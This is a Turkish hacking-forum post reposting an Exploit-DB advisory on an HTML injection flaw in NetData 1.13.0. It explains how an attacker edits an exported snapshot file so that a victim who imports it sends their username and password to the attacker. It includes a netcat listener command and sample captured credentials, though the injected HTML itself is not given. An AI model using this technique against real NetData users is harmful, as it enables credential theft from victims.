İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

NetData 1.13.0 - HTML Injection

16-03-2019 03:36
#1
deargod - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2019
Nereden:
vice city
Mesajlar:
167
Teşekkür (Etti):
20
Teşekkür (Aldı):
36
Konular:
15
Ticaret:
(0) %
# Exploit Title/Exploit Başlığı: NetData v1.13.0 HTML Injection Vulnerability
# Date/Tarih: 2019-03-14
# Exploit Author/Ekleyen: Marcelo Vázquez (aka s4vitar)
# Category/Kategori: Webapps
# Tested on/Tes edilen yer:Windows,Linux
# Vendor Homepage/NetData Web Sayfası: https://my-netdata.io/
# Software Link/NetData İndirme Linki: https://docs.netdata.cloud/packaging/installer/
# Version/Versiyon: <= NetData v1.13.0


NetData , sunucunuzun trafik, veritabanı , hafıza vb. işlemlerini canlı olarak takip etmenizi sağlayan bir yazılımdır.

**Güvenlik Açığı Türü**

NetData , birden çok HTML açığı bulunduruyor.

**Güvenlik Açığı**

NetData , dışa aktarma özelliği ile sunucunuzun herhangi bir andaki performansını daha sonra tekrar izleme amacıyla cihazınıza kaydeder.
Daha sonrada içe aktarabilir.
Saldırgan , bu dosyayı HTML olarak kendi IP adres bilgileri ile izleme amaçlı değiştirirse kurbanın kullanıcı adı ve parolası alınır.

**Örnek Kullanım**
Konsoldan kurbanın ip adresi ve portunu izleme alın.(port 4646)
Kurban düzenlenmiş içe aktarma dosyasını yükleyince girdiği veriler konsolda sırasıyla görüntülenecektir.

root@vps-server:~# nc -nlvp 4646
Listening on [0.0.0.0] (family 0, port 4646)
Connection from [XX.X.XXX.X] port 4646 [tcp/*] accepted (family 2, sport 36930)
GET /?username=test&password=passwordexample HTTP/1.1
Host: XXX.XXX.XX.XX:4646
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:19999/
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,es;q=0.9,en;q=0.8


#Exploit Adresi : https://www.exploit-db.com/exploits/46545
Kullanıcı İmzası
"Ulusal egemenlik öyle bir nurdur ki, onun karşısında zincirler erir, taç ve tahtlar yanar, mahvolur."
Mustafa Kemal ATATÜRK

telegram: deargod_tht


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı